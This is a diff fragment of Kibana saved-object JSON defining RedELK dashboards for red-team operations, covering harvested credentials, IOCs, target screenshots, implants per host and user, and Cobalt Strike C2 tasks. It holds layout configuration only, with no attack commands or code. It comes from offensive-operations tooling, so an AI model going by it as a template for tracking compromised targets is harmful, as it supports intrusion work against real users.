"name": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2:panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2", "type": "visualization"}, {"id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "name": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf:panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", "type": "visualization"}, {"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "9a987436-c698-4236-9b92-bfab81de8cc1:panel_9a987436-c698-4236-9b92-bfab81de8cc1", "type": "search"}], "sort": [1642152857910, 2115], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK credentials dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\"},\"panelIndex\":\"f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Credentials over time\",\"panelRefName\":\"panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"8c5ea210-ef6d-47a3-958b-16ccc6006582\"},\"panelIndex\":\"8c5ea210-ef6d-47a3-958b-16ccc6006582\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Total credentials\",\"panelRefName\":\"panel_8c5ea210-ef6d-47a3-958b-16ccc6006582\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"b98cc0b8-ee93-4d34-b458-cd311eb995ea\"},\"panelIndex\":\"b98cc0b8-ee93-4d34-b458-cd311eb995ea\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Credentials realms\",\"panelRefName\":\"panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":19,\"i\":\"77f94499-3c4b-49c0-8379-62d38f4d7d8e\"},\"panelIndex\":\"77f94499-3c4b-49c0-8379-62d38f4d7d8e\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e\"}]", "timeRestore": false, "title": "RedELK - Credentials dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "82b865a0-d318-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "ab609c60-d319-11ea-9301-a30a04251ae9", "name": "f26413a8-7bc3-4d63-8e2e-02d1c8e06b51:panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51", "type": "visualization"}, {"id": "dcf86190-d319-11ea-9301-a30a04251ae9", "name": "8c5ea210-ef6d-47a3-958b-16ccc6006582:panel_8c5ea210-ef6d-47a3-958b-16ccc6006582", "type": "visualization"}, {"id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "name": "b98cc0b8-ee93-4d34-b458-cd311eb995ea:panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea", "type": "visualization"}, {"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "77f94499-3c4b-49c0-8379-62d38f4d7d8e:panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e", "type": "search"}], "sort": [1642152857910, 2121], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK IOC dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"dfd53850-c595-4597-bbb5-ea03fc22e880\",\"w\":24,\"x\":0,\"y\":2},\"panelIndex\":\"dfd53850-c595-4597-bbb5-ea03fc22e880\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"IOC over time\",\"panelRefName\":\"panel_dfd53850-c595-4597-bbb5-ea03fc22e880\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"f13deeb7-53dc-41af-9de0-486d7a171916\",\"w\":17,\"x\":31,\"y\":2},\"panelIndex\":\"f13deeb7-53dc-41af-9de0-486d7a171916\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"IOC Types\",\"panelRefName\":\"panel_f13deeb7-53dc-41af-9de0-486d7a171916\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\",\"w\":7,\"x\":24,\"y\":2},\"panelIndex\":\"133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"h\":19,\"i\":\"d492599d-f662-450b-9982-54ab7db9f174\",\"w\":48,\"x\":0,\"y\":13},\"panelIndex\":\"d492599d-f662-450b-9982-54ab7db9f174\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_d492599d-f662-450b-9982-54ab7db9f174\"}]", "timeRestore": false, "title": "RedELK - IOC dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "86643e90-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "057076f0-d4e4-11ea-9301-a30a04251ae9", "name": "dfd53850-c595-4597-bbb5-ea03fc22e880:panel_dfd53850-c595-4597-bbb5-ea03fc22e880", "type": "visualization"}, {"id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", "name": "f13deeb7-53dc-41af-9de0-486d7a171916:panel_f13deeb7-53dc-41af-9de0-486d7a171916", "type": "visualization"}, {"id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", "name": "133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70:panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70", "type": "visualization"}, {"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "d492599d-f662-450b-9982-54ab7db9f174:panel_d492599d-f662-450b-9982-54ab7db9f174", "type": "search"}], "sort": [1642152857910, 2127], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK screenshots dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"d4eb5dce-3894-4599-8c17-042fc067d58c\"},\"panelIndex\":\"d4eb5dce-3894-4599-8c17-042fc067d58c\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Screenshots over time\",\"panelRefName\":\"panel_d4eb5dce-3894-4599-8c17-042fc067d58c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":19,\"i\":\"1db7741d-210a-4331-b1cb-affc6ac1334e\"},\"panelIndex\":\"1db7741d-210a-4331-b1cb-affc6ac1334e\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1db7741d-210a-4331-b1cb-affc6ac1334e\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\"},\"panelIndex\":\"3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Total screenshots\",\"panelRefName\":\"panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"66403011-8fb6-402f-b9b6-5f503d6df704\"},\"panelIndex\":\"66403011-8fb6-402f-b9b6-5f503d6df704\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Screenshots target users\",\"panelRefName\":\"panel_66403011-8fb6-402f-b9b6-5f503d6df704\"}]", "timeRestore": false, "title": "RedELK - Screenshots dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "a2dcebf0-d316-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", "name": "d4eb5dce-3894-4599-8c17-042fc067d58c:panel_d4eb5dce-3894-4599-8c17-042fc067d58c", "type": "visualization"}, {"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "1db7741d-210a-4331-b1cb-affc6ac1334e:panel_1db7741d-210a-4331-b1cb-affc6ac1334e", "type": "search"}, {"id": "389dddc0-d317-11ea-9301-a30a04251ae9", "name": "3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0:panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0", "type": "visualization"}, {"id": "659280b0-d317-11ea-9301-a30a04251ae9", "name": "66403011-8fb6-402f-b9b6-5f503d6df704:panel_66403011-8fb6-402f-b9b6-5f503d6df704", "type": "visualization"}], "sort": [1642152857910, 2133], "type": "dashboard", "version": "1"} \ No newline at end of file +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":3,\"i\":\"93f74516-7d73-4db3-8d64-589dfd7492b7\"},\"panelIndex\":\"93f74516-7d73-4db3-8d64-589dfd7492b7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_93f74516-7d73-4db3-8d64-589dfd7492b7\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":3,\"w\":48,\"h\":3,\"i\":\"66e33663-63c3-4e78-aa5d-725e33754c02\"},\"panelIndex\":\"66e33663-63c3-4e78-aa5d-725e33754c02\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_66e33663-63c3-4e78-aa5d-725e33754c02\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":6,\"w\":8,\"h\":9,\"i\":\"800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\"},\"panelIndex\":\"800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":8,\"y\":6,\"w\":8,\"h\":9,\"i\":\"86117a55-669e-4d4d-a4d6-436da4f1a930\"},\"panelIndex\":\"86117a55-669e-4d4d-a4d6-436da4f1a930\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_86117a55-669e-4d4d-a4d6-436da4f1a930\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":16,\"y\":6,\"w\":8,\"h\":9,\"i\":\"ab07bed8-9d4e-409c-b3db-d15124eb5467\"},\"panelIndex\":\"ab07bed8-9d4e-409c-b3db-d15124eb5467\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_ab07bed8-9d4e-409c-b3db-d15124eb5467\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":6,\"w\":8,\"h\":9,\"i\":\"019655aa-c9de-444a-a4af-619b7297572b\"},\"panelIndex\":\"019655aa-c9de-444a-a4af-619b7297572b\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_019655aa-c9de-444a-a4af-619b7297572b\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":32,\"y\":6,\"w\":16,\"h\":9,\"i\":\"43a0761e-49bc-4846-9956-04a604b063ec\"},\"panelIndex\":\"43a0761e-49bc-4846-9956-04a604b063ec\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_43a0761e-49bc-4846-9956-04a604b063ec\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":15,\"w\":8,\"h\":9,\"i\":\"eab2038d-128a-4b5b-8a72-701fd3f53bd8\"},\"panelIndex\":\"eab2038d-128a-4b5b-8a72-701fd3f53bd8\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":8,\"y\":15,\"w\":8,\"h\":9,\"i\":\"e18544fe-ac30-43cf-891c-4448ffea6bbd\"},\"panelIndex\":\"e18544fe-ac30-43cf-891c-4448ffea6bbd\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_e18544fe-ac30-43cf-891c-4448ffea6bbd\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":16,\"y\":15,\"w\":16,\"h\":9,\"i\":\"6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\"},\"panelIndex\":\"6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Compromised realms\",\"panelRefName\":\"panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":32,\"y\":15,\"w\":8,\"h\":9,\"i\":\"223951c1-7fe0-40f9-9a89-0c91aedd7fce\"},\"panelIndex\":\"223951c1-7fe0-40f9-9a89-0c91aedd7fce\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":40,\"y\":15,\"w\":8,\"h\":9,\"i\":\"c15dc2cd-fad3-44a3-b127-1cd47d837740\"},\"panelIndex\":\"c15dc2cd-fad3-44a3-b127-1cd47d837740\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_c15dc2cd-fad3-44a3-b127-1cd47d837740\"}]", "refreshInterval": {"pause": true, "value": 0}, "timeFrom": "now-12M", "timeRestore": true, "timeTo": "now", "title": "RedELK - Summary dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "02486040-d355-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "93f74516-7d73-4db3-8d64-589dfd7492b7:panel_93f74516-7d73-4db3-8d64-589dfd7492b7", "type": "visualization"}, {"id": "45491770-0886-11eb-a2d2-171dc8941414", "name": "66e33663-63c3-4e78-aa5d-725e33754c02:panel_66e33663-63c3-4e78-aa5d-725e33754c02", "type": "visualization"}, {"id": "b19d4790-d35f-11ea-9301-a30a04251ae9", "name": "800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3:panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3", "type": "visualization"}, {"id": "dcf86190-d319-11ea-9301-a30a04251ae9", "name": "86117a55-669e-4d4d-a4d6-436da4f1a930:panel_86117a55-669e-4d4d-a4d6-436da4f1a930", "type": "visualization"}, {"id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "name": "ab07bed8-9d4e-409c-b3db-d15124eb5467:panel_ab07bed8-9d4e-409c-b3db-d15124eb5467", "type": "visualization"}, {"id": "389dddc0-d317-11ea-9301-a30a04251ae9", "name": "019655aa-c9de-444a-a4af-619b7297572b:panel_019655aa-c9de-444a-a4af-619b7297572b", "type": "visualization"}, {"id": "ce581930-d361-11ea-9301-a30a04251ae9", "name": "43a0761e-49bc-4846-9956-04a604b063ec:panel_43a0761e-49bc-4846-9956-04a604b063ec", "type": "visualization"}, {"id": "57626ad0-d355-11ea-9301-a30a04251ae9", "name": "eab2038d-128a-4b5b-8a72-701fd3f53bd8:panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8", "type": "visualization"}, {"id": "464660c0-d360-11ea-9301-a30a04251ae9", "name": "e18544fe-ac30-43cf-891c-4448ffea6bbd:panel_e18544fe-ac30-43cf-891c-4448ffea6bbd", "type": "visualization"}, {"id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "name": "6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d:panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d", "type": "visualization"}, {"id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "name": "223951c1-7fe0-40f9-9a89-0c91aedd7fce:panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce", "type": "visualization"}, {"id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "name": "c15dc2cd-fad3-44a3-b127-1cd47d837740:panel_c15dc2cd-fad3-44a3-b127-1cd47d837740", "type": "visualization"}], "sort": [1645365255915, 13365], "type": "dashboard", "version": "1"} +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"9af964d0-b9c5-4fa0-81d7-6e7cf9657757\"},\"panelIndex\":\"9af964d0-b9c5-4fa0-81d7-6e7cf9657757\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":6,\"i\":\"09cb7bd6-8162-4141-8a0c-807ee57a4603\"},\"panelIndex\":\"09cb7bd6-8162-4141-8a0c-807ee57a4603\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Target host(s) and user(s) filter\",\"panelRefName\":\"panel_09cb7bd6-8162-4141-8a0c-807ee57a4603\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":12,\"h\":6,\"i\":\"fcd3a5bc-91d9-46a2-b08c-92958c5b6089\"},\"panelIndex\":\"fcd3a5bc-91d9-46a2-b08c-92958c5b6089\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Implants per host\",\"panelRefName\":\"panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":36,\"y\":2,\"w\":12,\"h\":6,\"i\":\"47710d04-18f9-4563-bf0d-73b4dc24f9e5\"},\"panelIndex\":\"47710d04-18f9-4563-bf0d-73b4dc24f9e5\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Implants per user\",\"panelRefName\":\"panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":8,\"w\":48,\"h\":51,\"i\":\"30674424-d470-4b93-80c1-260d16f987ab\"},\"panelIndex\":\"30674424-d470-4b93-80c1-260d16f987ab\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_30674424-d470-4b93-80c1-260d16f987ab\"}]", "timeRestore": false, "title": "RedELK - Red Team Operations", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "04b87c50-d028-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "9af964d0-b9c5-4fa0-81d7-6e7cf9657757:panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757", "type": "visualization"}, {"id": "d2c7b720-d026-11ea-9301-a30a04251ae9", "name": "09cb7bd6-8162-4141-8a0c-807ee57a4603:panel_09cb7bd6-8162-4141-8a0c-807ee57a4603", "type": "visualization"}, {"id": "632081a0-d02a-11ea-9301-a30a04251ae9", "name": "fcd3a5bc-91d9-46a2-b08c-92958c5b6089:panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089", "type": "visualization"}, {"id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", "name": "47710d04-18f9-4563-bf0d-73b4dc24f9e5:panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5", "type": "visualization"}, {"id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", "name": "30674424-d470-4b93-80c1-260d16f987ab:panel_30674424-d470-4b93-80c1-260d16f987ab", "type": "search"}], "sort": [1645363347725, 1502], "type": "dashboard", "version": "1"} +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\"},\"panelIndex\":\"8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":9,\"i\":\"ecf77ead-e22f-4708-addf-0cbaaeb6fced\"},\"panelIndex\":\"ecf77ead-e22f-4708-addf-0cbaaeb6fced\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Techniques, Tactics and Procedures\",\"panelRefName\":\"panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":24,\"h\":18,\"i\":\"ff3f84bc-6c84-43fd-aa0f-19e5a91be826\"},\"panelIndex\":\"ff3f84bc-6c84-43fd-aa0f-19e5a91be826\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"C2 tasks per host and user\",\"panelRefName\":\"panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":11,\"w\":24,\"h\":9,\"i\":\"23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\"},\"panelIndex\":\"23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Cobalt Strike tasks per operator\",\"panelRefName\":\"panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":20,\"w\":48,\"h\":14,\"i\":\"b038a84c-9db0-4266-af43-c8023da4781a\"},\"panelIndex\":\"b038a84c-9db0-4266-af43-c8023da4781a\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"C2 tasks\",\"panelRefName\":\"panel_b038a84c-9db0-4266-af43-c8023da4781a\"}]", "timeRestore": false, "title": "RedELK - Tasks", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "0523c8a0-d025-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "8f1a6a90-4b7e-47ef-aa74-a6037b7461e1:panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1", "type": "visualization"}, {"id": "88db1280-d024-11ea-9301-a30a04251ae9", "name": "ecf77ead-e22f-4708-addf-0cbaaeb6fced:panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced", "type": "visualization"}, {"id": "a5554e20-d025-11ea-9301-a30a04251ae9", "name": "ff3f84bc-6c84-43fd-aa0f-19e5a91be826:panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826", "type": "visualization"}, {"id": "afb6ce00-d022-11ea-9301-a30a04251ae9", "name": "23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e:panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e", "type": "visualization"}, {"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "b038a84c-9db0-4266-af43-c8023da4781a:panel_b038a84c-9db0-4266-af43-c8023da4781a", "type": "search"}], "sort": [1645363347725, 1508], "type": "dashboard", "version": "1"} +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":true,\"key\":\"tags\",\"negate\":false,\"params\":{\"query\":\"iplist_redteam\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"iplist_redteam\"}}},{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":true,\"key\":\"tags\",\"negate\":false,\"params\":{\"query\":\"iplist_customer\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"iplist_customer\"}}}]}"}, "optionsJSON": "{\"darkTheme\":false,\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"948c1286-d4de-44a6-8fb2-95bf9252ed00\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"948c1286-d4de-44a6-8fb2-95bf9252ed00\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_948c1286-d4de-44a6-8fb2-95bf9252ed00\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":5,\"i\":\"ab9eb0fb-a164-4295-8177-865a2a67dccb\",\"w\":36,\"x\":0,\"y\":2},\"panelIndex\":\"ab9eb0fb-a164-4295-8177-865a2a67dccb\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"Filters\",\"panelRefName\":\"panel_ab9eb0fb-a164-4295-8177-865a2a67dccb\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":5,\"i\":\"c630a33e-6a98-466d-8223-fd83e6947b8c\",\"w\":12,\"x\":36,\"y\":2},\"panelIndex\":\"c630a33e-6a98-466d-8223-fd83e6947b8c\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"HTTP Redir traffic per 